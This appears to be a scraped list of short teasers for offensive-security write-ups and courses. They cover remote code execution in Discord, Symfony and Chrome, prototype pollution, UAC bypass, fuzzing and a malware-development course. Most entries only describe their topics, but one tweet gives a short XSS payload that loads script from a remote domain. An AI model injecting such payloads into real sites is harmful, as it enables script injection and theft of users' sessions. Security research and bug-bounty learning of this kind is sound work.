A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...

It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…

Remote code execution using Symfony's _fragment's page and unsecure secret values.

While looking into bypasses for the per form CSRF token in my last post, I was digging into every method that was used to generate urls, trying to find one that could be used to create the required token.

Prototype Pollution and useful Script Gadgets. Contribute to BlackFan/client-side-prototype-pollution development by creating an account on GitHub.

an XSS payload with script src for short length inputs <script src=//⑮.₨></script> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking

RTO: Malware Development Intermediate course teaser

Link to the course: https://institute.sektor7.net/rto-maldev-intermediate


Other online courses from RED TEAM Operator series: https://institute.sektor7.net

Twitter: https://twitter.com/sektor7net
Labs:…

It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…

I am sharing some of my methodology, recourses, tips and advices to become a better bug bounty hunter.

Updated: 26 Feb 2023 With Technitium DNS Server , you can not just consume DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), or DNS-over-QUI...

In this post I’ll give details about how to exploit CVE-2020-6449, a use-after-free (UAF) in the WebAudio module of Chrome that I discovered in March 2020. I’ll give an outline of the general strategy to exploit this type of UAF to achieve a sandboxed RCE…

Vendor: Pulse SecureVendor URL: affected: Pulse Connect Secure (PCS) 9.1Rx or belowSystems Affected: Pulse Connect Secure (PCS) AppliancesCVE Identifier: CVE-2020-8260Advisory URL: 7.2 High CVSS:3.…

CodeQL is GitHub's expressive language and engine for code analysis, which allows you to explore source code to find bugs and security vulnerabilities. During this beginner-friendly workshop, you will learn to write queries in CodeQL and find known security…

I was recently on an engagement where we phished in and ran into UAC which gave me more trouble than I expected. When a user logs onto Windows, a logon session is created and the credentials are ti…

Some server-side mysteries, the unveiling of the lesser-known techniques, and how inconsistency in the URL parsing and treating of certain elements by the server-side components that usually go undetected and can open up big gaps are waiting to be demystified!…

Introduction I’ve been passively consuming a lot of fuzzing-related material in the last few months as I’ve primarily tried to up my Windows exploitation game from Noob-Level to 1%-Less-Noob-Level, and I’ve found it utterly fascinating. In this post I will…